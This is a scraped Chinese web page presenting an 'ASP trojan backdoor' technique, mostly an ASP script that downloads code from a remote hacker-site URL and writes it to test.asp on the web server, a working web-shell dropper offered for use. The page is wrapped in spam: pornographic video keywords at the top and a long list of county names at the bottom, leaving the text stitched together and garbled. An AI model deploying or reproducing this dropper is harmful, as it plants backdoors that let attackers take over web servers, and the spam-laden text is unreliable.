最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

ASP木馬后門新思路

 更新時(shí)間:2007年01月16日 00:00:00   作者:  
<%  
Function GetPage(url)  
dim Retrieval  
Set Retrieval = createObject("Microsoft.XMLHTTP")  
With Retrieval  
.Open "Get", url, False ', "", ""  
.Send  
GetPage = BytesToBstr(.ResponseBody)  
End With  
Set Retrieval = Nothing  
End Function  

Function BytesToBstr(body)  
dim objstream  
set objstream = Server.createObject("adodb.stream")  
objstream.Type = 1  
objstream.Mode =3  
objstream.Open  
objstream.Write body  
objstream.Position = 0  
objstream.Type = 2  
objstream.Charset = "GB2312"  
BytesToBstr = objstream.ReadText  
objstream.Close  
set objstream = nothing  
End Function  
on error resume next  
Url="http://www.heibai.org/hacker/daemon.txt"  
response.write "開始取得遠(yuǎn)程代碼........"  
wstr = GetPage(Url)  

Set fs=Server.createObject("Scripting.FileSystemObject")  

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")  
Crfi.Writeline(wstr)  
set CrFi=nothing  
set fs=nothing  
response.write "...<font color=red>生成test.asp文件成功</font>"  
%>  

相關(guān)文章

最新評(píng)論

岳阳县| 潞西市| 麦盖提县| 定远县| 肇东市| 祥云县| 遂平县| 鸡西市| 盐源县| SHOW| 车致| 综艺| 阳山县| 八宿县| 新民市| 宁德市| 沾化县| 阿图什市| 喀什市| 毕节市| 贺州市| 翼城县| 定结县| 清新县| 新河县| 开平市| 云梦县| 瑞金市| 安乡县| 惠水县| 沾化县| 威远县| 麻栗坡县| 资源县| 靖宇县| 菏泽市| 华蓥市| 望谟县| 历史| 南召县| 上杭县|